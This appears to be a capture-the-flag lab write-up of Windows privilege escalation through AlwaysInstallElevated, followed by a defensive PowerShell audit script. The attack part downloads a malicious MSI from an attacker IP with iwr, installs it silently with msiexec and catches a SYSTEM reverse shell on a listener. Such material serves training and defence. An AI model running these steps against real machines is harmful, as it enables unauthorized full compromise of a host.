AlwaysInstallElevated


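The target system has AlwaysInstallElevated enabled, so Windows Installer runs MSI packages with SYSTEM privileges even when a standard user starts the installation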

PS C:\xampp\htdocs\shenzi> iwr -Uri http://192.168.45.217/malicious.msi -OutFile .\malicious.msi

Delivering the payload

PS C:\xampp\htdocs\shenzi> msiexec /quiet /qn /i C:\xampp\htdocs\shenzi\malicious.msi

Invoking…

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ nnc 1234                                      
listening on [any] 1234 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.167.55] 51771
Windows PowerShell running as user shenzi on SHENZI
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
shenzi
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.167.55
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.167.254

SYSTEM-level compromise
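
Defender-side check for the misconfiguration used above, as an added example that is not part of the original notes: it audits the AlwaysInstallElevated policy in HKLM and in the loaded user hives, optionally resets the machine value, and lists MSI installs started from unusual paths (such as the web root used here). The `$Remediate` switch and the path heuristic are assumptions made for this example.

```powershell
# Added example, not from the original notes. Run from an elevated prompt.
# Windows Installer elevates only when AlwaysInstallElevated is 1 in HKLM
# AND in the installing user's HKCU, so both sides are checked.
$sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$name = 'AlwaysInstallElevated'
$Remediate = $false   # hypothetical switch: set to $true to write 0 to HKLM

function Test-AieValue {
    param([string]$KeyPath)
    $p = Get-ItemProperty -Path $KeyPath -Name $name -ErrorAction SilentlyContinue
    return [bool]($p -and $p.$name -eq 1)
}

$machine = Test-AieValue "HKLM:\$sub"

# Loaded user hives only (skips *_Classes and built-in service SIDs);
# profiles that are not logged on are not covered.
$exposed = @(Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } |
    Where-Object { $machine -and
        (Test-AieValue "Registry::HKEY_USERS\$($_.PSChildName)\$sub") } |
    ForEach-Object { $_.PSChildName })

if ($exposed.Count -gt 0) {
    Write-Warning "AlwaysInstallElevated is effective for: $($exposed -join ', ')"
    if ($Remediate) {
        # A GPO that sets this value will re-apply it; fix the GPO as well.
        Set-ItemProperty -Path "HKLM:\$sub" -Name $name -Value 0 -Type DWord
    }
} else {
    Write-Output "AlwaysInstallElevated is not effective (HKLM enabled: $machine)"
}

# MsiInstaller event 1040 records the package path of each install.
# The path filter is a heuristic chosen for this example: flag packages
# started from outside the usual installer locations, such as a web root.
$usual = '\\Windows\\Installer\\|\\Program Files|\\ProgramData\\'
Get-WinEvent -FilterHashtable @{
        LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1040
    } -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -notmatch $usual } |
    Select-Object TimeCreated, Message
```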